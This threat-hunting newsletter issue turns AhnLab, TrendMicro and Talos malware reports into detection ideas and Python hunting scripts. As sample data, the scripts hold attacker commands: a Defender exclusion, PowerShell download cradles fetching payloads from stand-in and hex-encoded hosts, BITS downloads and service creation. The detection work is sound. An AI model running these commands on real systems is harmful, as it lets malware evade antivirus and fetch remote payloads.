Threat Hunter's Digest - 2024-06-03
Greetings,
⏩BLUF
This issue's Threat Hunting / Detection suggestions are based on the following:
TrendMicro’s post on Water Sigbin: 3 rules
Ahnlab’s post on Cryptojacking on Windows: 5 rules
Cisco Talos’s post on LilacSquid: 3 rules
Next update on Thursday, June 6th.
📰The Headlines
[AhnLab] Distribution of Malware Under the Guise of MS Office Cracked Versions (XMRig, OrcusRAT, etc.)
Source: https://asec.ahnlab.com/en/66017/
My favourite Korean security team is back with an analysis of malware masquerading as cracked versions of MS Office. While the post contains some IOCs, these are less likely to match anything in your network if you're not in South Korea. That said, here are some threat-hunting ideas based on techniques that are useful wherever you are on the globe:
Figure 7 in the report shows a wealth of information:

Notice how the attackers add a Windows Defender process exclusion for their executable. This is done using the command:

Add-MpPreference -ExclusionProcess '<executable_name>'

One caveat worth knowing when you write the detection: a process exclusion does not exempt the executable itself from scanning; it exempts the files that process opens from real-time scanning, which is exactly what the attackers need for the downloads that follow. You can detect this using the Sigma rule here.

The attackers then create a copy of powershell.exe with the executable name they excluded from scanning. You can detect renamed copies of powershell.exe and other system binaries using the Sigma rule here (the usual check compares the PE OriginalFileName field, which Sysmon logs in Event ID 1, against the file name on disk).

With a copy of powershell.exe excluded from scanning, the attackers download and execute their malware. You can detect this using the rule here. Notice that the rule does not explicitly mention the executable name (powershell.exe), so it will detect this attack despite the renamed executable.

Finally, the attackers download extra tooling over BITS, but they do so from PowerShell (for example via the Start-BitsTransfer cmdlet) instead of the bitsadmin.exe executable. You can detect this and other download methods using the Sigma rule here.

XMRig can be detected using domain lookups with the rule here. Please note that the mining pool used in the attack (minecraftrpgserver[.]com) is not in the list used by the rule, so add it if you want coverage for this campaign.
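To make the four hunts above concrete, here is an added Python example (mine, not AhnLab's and not a Sigma rule) that runs them over a handful of constructed Sysmon-style process-creation events: a Defender exclusion being added, a renamed copy of powershell.exe spotted through the OriginalFileName field, a download cradle matched on the command line regardless of the image name, and BITS driven from PowerShell. The events, the updater.exe name and the example.invalid host are invented for the example.

```python
"""Added example: run the AhnLab hunts over Sysmon-style process events.

Constructed sample events (a subset of Sysmon Event ID 1 fields); the
paths, the updater.exe name and the example.invalid host are made up.
"""
import re
from typing import Dict, List, Tuple

Event = Dict[str, str]

SAMPLE_EVENTS: List[Event] = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "OriginalFileName": "PowerShell.EXE",
     "CommandLine": r"powershell -c Add-MpPreference -ExclusionProcess 'updater.exe'"},
    {"Image": r"C:\Users\Public\updater.exe",  # renamed copy of powershell.exe
     "OriginalFileName": "PowerShell.EXE",
     "CommandLine": r"updater.exe -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"},
    {"Image": r"C:\Users\Public\updater.exe",
     "OriginalFileName": "PowerShell.EXE",
     "CommandLine": r"updater.exe -c Start-BitsTransfer -Source http://example.invalid/b -Destination C:\Users\Public\b.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",  # benign
     "OriginalFileName": "PowerShell.EXE",
     "CommandLine": r"powershell -c Get-Date"},
]

# Add-MpPreference with any of the exclusion parameters.
EXCLUSION_RE = re.compile(r"add-mppreference\b.*?-exclusion(?:process|path|extension)\b", re.I)
# Download cradles matched on the command line only, so a renamed host binary does not matter.
CRADLE_RE = re.compile(
    r"\b(?:downloadstring|downloadfile|invoke-webrequest|iwr|invoke-restmethod|irm|start-bitstransfer)\b", re.I)
# BITS driven from PowerShell rather than from bitsadmin.exe.
BITS_PS_RE = re.compile(r"\bstart-bitstransfer\b", re.I)
# Binaries whose PE OriginalFileName should match the name on disk.
RENAME_WATCHLIST = {"powershell.exe", "cmd.exe", "mshta.exe", "rundll32.exe", "wscript.exe", "cscript.exe"}


def is_renamed(ev: Event) -> bool:
    """True when a watched binary runs under a different file name than its PE header says."""
    original = ev.get("OriginalFileName", "").lower()
    on_disk = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
    return original in RENAME_WATCHLIST and original != on_disk


def hunt(events: List[Event]) -> List[Tuple[int, str]]:
    """Return (event index, hunt name) pairs for every hunt that fires on an event."""
    hits: List[Tuple[int, str]] = []
    for i, ev in enumerate(events):
        cmdline = ev.get("CommandLine", "")
        if EXCLUSION_RE.search(cmdline):
            hits.append((i, "defender_exclusion"))
        if is_renamed(ev):
            hits.append((i, "renamed_lolbin"))
        if CRADLE_RE.search(cmdline):
            hits.append((i, "download_cradle"))
        if BITS_PS_RE.search(cmdline):
            hits.append((i, "bits_from_powershell"))
    return hits


if __name__ == "__main__":
    for index, name in hunt(SAMPLE_EVENTS):
        print(f"event {index}: {name}")
```

The cradle and BITS checks deliberately never look at the Image field, which is the property of the rule the newsletter points out: the renamed copy in events 1 and 2 still fires, while the benign Get-Date launch in event 3 stays quiet.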
[TrendMicro] Decoding Water Sigbin's Latest Obfuscation Tricks
Source: https://www.trendmicro.com/en_us/research/24/e/decoding-8220-latest-obfuscation-tricks.html
TrendMicro wrote a report on the Water Sigbin threat actor group that describes a couple of interesting behaviours:

The attackers used an interesting technique to download malware using PowerShell. While they still used the usual IEX … DownloadString() combo, the interesting bit is that they wrote the IP address in hexadecimal notation instead of the usual dotted decimal notation. Searching for four-byte hexadecimal numbers in the command line would be an interesting threat hunt. If you don't happen to speak regex, you can use this one: 0x[\da-fA-F]{8}. Expect some noise, since any eight-hex-digit constant matches too, so correlate hits with a download cradle such as DownloadString and decode the value to dotted decimal before you pivot on it. Keep in mind that hex is only one way to write an IPv4 address without dots; a single 32-bit decimal integer is another, and this regex does not catch that form.

The script in Figure 4 is interesting because it uses the same technique that this Sigma rule detects, but with a different syntax (that is, the Sigma rule won't fire on this script). That said, a threat hunt on -windowstyle hidden (or any of the variations in the Sigma rule) would be interesting, if a bit on the noisy side. You can always filter things down by correlating this with FromBase64String.

Finally, the obfuscation technique in Figure 7 is a very interesting one. Anyone who's been in the detection field long enough knows that a human can easily recognize random strings, but it is not as easy to put that in a rule. Without seeing more samples, my recommendation is to look for set commands where the value being assigned contains known commands. The known commands from the article are: start, exit, rem, not, and defined. Some of these strings are short, so play around with the regexes so you don't end up with partial matches (not inside notepad, rem inside remove). If your SIEM solution supports it, may I recommend familiarizing yourself with the \b word-boundary assertion (see the questions section below).
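As an added example (mine, not from the TrendMicro post), the Python below implements the three hunts from this section over constructed command lines: decoding hex-notation IPs found by the regex above so you get a dotted-decimal value to pivot on, correlating hidden-window launches with FromBase64String, and finding set assignments whose value contains one of the listed commands, bounded with \b so that not does not match notepad. It goes one step beyond the text by also decoding a URL host written as a plain decimal integer, which the hex regex does not cover. The -windowstyle handling assumes PowerShell's acceptance of parameter-name prefixes (-w, -win, and so on); the hosts, scripts and variable names are invented.

```python
"""Added example: the three hunts from the Water Sigbin section, over constructed
command lines. The hosts, scripts and variable names are invented."""
import re
from ipaddress import IPv4Address
from typing import List

# Eight hex digits behind 0x, as in the newsletter's regex, with \b on both sides so
# a nine-digit constant or a value glued to a word does not match.
HEX_IP_RE = re.compile(r"\b0x([0-9a-fA-F]{8})\b")
# Beyond the text: a URL host written as one 32-bit decimal integer (no dots at all).
DEC_HOST_RE = re.compile(r"://(\d{8,10})(?=[/:'\"\s]|$)")


def _prefixes(word: str) -> str:
    """Alternation of every non-empty prefix of word, longest first (windowstyle ... w).
    Assumes PowerShell accepts unambiguous parameter-name prefixes such as -w and -win."""
    return "|".join(word[:i] for i in range(len(word), 0, -1))


HIDDEN_RE = re.compile(rf"-(?:{_prefixes('windowstyle')})\s+(?:hidden|1)\b", re.I)
B64_RE = re.compile(r"\bFromBase64String\b", re.I)

# Batch 'set' assignment: set name=value or set "name=value".
SET_RE = re.compile(r'\bset\s+"?([A-Za-z_]\w*)=([^"\r\n&|]*)', re.I)
# The commands listed in the article, bounded so 'not' does not match 'notepad'.
KNOWN_CMD_RE = re.compile(r"\b(?:start|exit|rem|not|defined)\b", re.I)


def decode_hex_ips(cmdline: str) -> List[str]:
    """Dotted-decimal form of every 0x-prefixed 32-bit value in the command line."""
    return [str(IPv4Address(int(h, 16))) for h in HEX_IP_RE.findall(cmdline)]


def decode_decimal_hosts(cmdline: str) -> List[str]:
    """Dotted-decimal form of integer URL hosts that fit in 32 bits."""
    return [str(IPv4Address(int(d))) for d in DEC_HOST_RE.findall(cmdline) if int(d) <= 0xFFFFFFFF]


def hidden_with_base64(cmdline: str) -> bool:
    """Hidden-window launch correlated with FromBase64String, as suggested above."""
    return bool(HIDDEN_RE.search(cmdline) and B64_RE.search(cmdline))


def obfuscated_set_vars(script: str) -> List[str]:
    """Names of variables whose assigned value contains one of the known commands."""
    return [name for name, value in SET_RE.findall(script) if KNOWN_CMD_RE.search(value)]


# Constructed samples.
HEX_CRADLE = "powershell -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://0xC0A80001/a.ps1')"
DEC_CRADLE = "powershell -c IEX (New-Object Net.WebClient).DownloadString('http://3232235521/a.ps1')"
B64_LAUNCH = "powershell -win hidden -c IEX([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aGk=')))"
BATCH = 'set a=start\r\nset "b=notepad.exe"\r\nset c=remove\r\nset d=if not defined x\r\n'

if __name__ == "__main__":
    print(decode_hex_ips(HEX_CRADLE), decode_decimal_hosts(DEC_CRADLE))
    print(hidden_with_base64(HEX_CRADLE), hidden_with_base64(B64_LAUNCH))
    print(obfuscated_set_vars(BATCH))
```

Both 0xC0A80001 and 3232235521 decode to the same address, which is the value you actually want in a hunt query. In the batch sample only a (start) and d (not, defined) are reported; b and c survive because the word boundaries refuse the partial matches inside notepad and remove.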
[Talos] LilacSquid: The stealthy trilogy of PurpleInk, InkBox and InkLoader
Source: https://blog.talosintelligence.com/lilacsquid/
Talos reported on a threat actor group that they dubbed LilacSquid, along with very squid-inspired names for the tools the group uses. Here are a few things you can use for threat hunting:

Bitsadmin remains popular as a download tool for attackers. While the post does not mention the parent process of bitsadmin.exe, we assume it is either cmd.exe or powershell.exe, which can be an interesting threat hunt depending on what's on your network. Of course, you can always check what the common parent processes of bitsadmin.exe are in your environment and exclude them for a wider-reaching hunt.

The service creation command (sc create …) shown in the post does not include the path where the malware was installed, which would have made an interesting threat hunt if the malware had been installed in an odd directory. You could hunt for services with the name TransactExDetect, or a substring of it such as Detect, but the results would be very specific to this particular threat actor.

Detection of MeshAgent can be done using the Sigma rule here.
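An added example (mine, not Talos's) of the two LilacSquid hunts in Python over constructed events: a rarity baseline for the parent of bitsadmin.exe that also flags interactive shells as parents, and an sc create parser that checks the service name against a watchlist and the binPath against the usual program directories (the odd-directory hunt the post's command line did not allow). The paths, the Contoso deploy tool and all service names other than TransactExDetect are invented.

```python
"""Added example: two LilacSquid hunts over constructed process events and
command lines. Paths, the Contoso deploy tool and all service names except
TransactExDetect are invented."""
import re
from collections import Counter
from typing import Dict, List, Tuple

Event = Dict[str, str]

SAMPLE_EVENTS: List[Event] = [
    {"Image": r"C:\Windows\System32\bitsadmin.exe", "ParentImage": r"C:\Program Files\Contoso Deploy\deploy.exe"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe", "ParentImage": r"C:\Program Files\Contoso Deploy\deploy.exe"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe", "ParentImage": r"C:\Program Files\Contoso Deploy\deploy.exe"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe", "ParentImage": r"C:\Program Files\Contoso Deploy\deploy.exe"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe", "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe", "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe"},  # not bitsadmin, ignored
]

SAMPLE_CMDLINES = [
    r'sc create TransactExDetect binPath= "C:\ProgramData\tx\svc.exe" start= auto',
    r'sc create ContosoAgent binPath= "C:\Program Files\Contoso\agent.exe" start= auto',
    r'sc.exe create Helper binPath= C:\Users\Public\h.exe',
    r'net start Helper',
]

SHELL_PARENTS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def rare_bitsadmin_parents(events: List[Event], max_share: float = 0.2) -> Dict[int, List[str]]:
    """Flag bitsadmin.exe launches whose parent is a shell or is rare in this data set.
    The baseline is the share of all bitsadmin launches each parent accounts for."""
    bits = [(i, ev) for i, ev in enumerate(events) if _basename(ev["Image"]) == "bitsadmin.exe"]
    if not bits:
        return {}
    parent_counts = Counter(_basename(ev["ParentImage"]) for _, ev in bits)
    flagged: Dict[int, List[str]] = {}
    for i, ev in bits:
        parent = _basename(ev["ParentImage"])
        reasons = []
        if parent in SHELL_PARENTS:
            reasons.append("shell_parent")
        if parent_counts[parent] / len(bits) <= max_share:
            reasons.append("rare_parent")
        if reasons:
            flagged[i] = reasons
    return flagged


# sc create <name> ... ; sc.exe create also accepted, name optionally quoted.
SC_CREATE_RE = re.compile(r'\bsc(?:\.exe)?\s+create\s+"?([^\s"]+)"?(.*)', re.I)
# binPath= "quoted path" or binPath= bare\path (sc requires the space after '=').
BINPATH_RE = re.compile(r'binpath=\s*(?:"([^"]+)"|(\S+))', re.I)
WATCH_NAME_RE = re.compile(r"detect", re.I)  # substring hunt; catches TransactExDetect from the report
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def hunt_service_creations(cmdlines: List[str]) -> List[Tuple[str, str]]:
    """(service name, reason) for sc create lines with a watched name or an odd binPath."""
    hits: List[Tuple[str, str]] = []
    for cmdline in cmdlines:
        m = SC_CREATE_RE.search(cmdline)
        if not m:
            continue
        name, rest = m.group(1), m.group(2)
        if WATCH_NAME_RE.search(name):
            hits.append((name, "name_watchlist"))
        b = BINPATH_RE.search(rest)
        if b:
            binpath = (b.group(1) or b.group(2)).strip().lower()
            if not binpath.startswith(TRUSTED_PREFIXES):
                hits.append((name, "untrusted_binpath"))
    return hits


if __name__ == "__main__":
    print(rare_bitsadmin_parents(SAMPLE_EVENTS))
    print(hunt_service_creations(SAMPLE_CMDLINES))
```

In the sample the deployment tool accounts for four of six bitsadmin launches and is left alone, while the cmd.exe and powershell.exe parents are reported both as shells and as rare; tune max_share to your own data, and feed the baseline a longer window than the events you are judging so a noisy day does not hide itself.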
🤔There Are No Stupid Questions
What does \b do in regex?

The b in \b stands for boundary: it is a zero-width assertion that matches the position at the start or end of a word, that is, between a word character (letters, digits and underscore in most engines) and a non-word character, or the start or end of the input. The word can be terminated by a space, but it can also be in "quotes", in (brackets), or at the end of the line. Doing something like \bsome_word\b would match some_word but not this_is_some_word, because the underscore is a word character and so there is no boundary there.

What is a Sigbin (from the TrendMicro blog post)?
I had to look this up, but according to Wikipedia: "The Sigbin or Sigben is a creature in Philippine mythology said to come out at night to suck the blood of victims from their shadows. It is said to walk backwards with its head lowered between its hind legs, and to have the ability to become invisible (have a stealth ability) to other creatures, especially humans."
This is what AI generated for Sigbin, if you’re curious:
If you have a question not covered in this section, click the button below and submit your question.
If you found this newsletter useful, feel free to subscribe and share.
Detectfully yours,
Tareq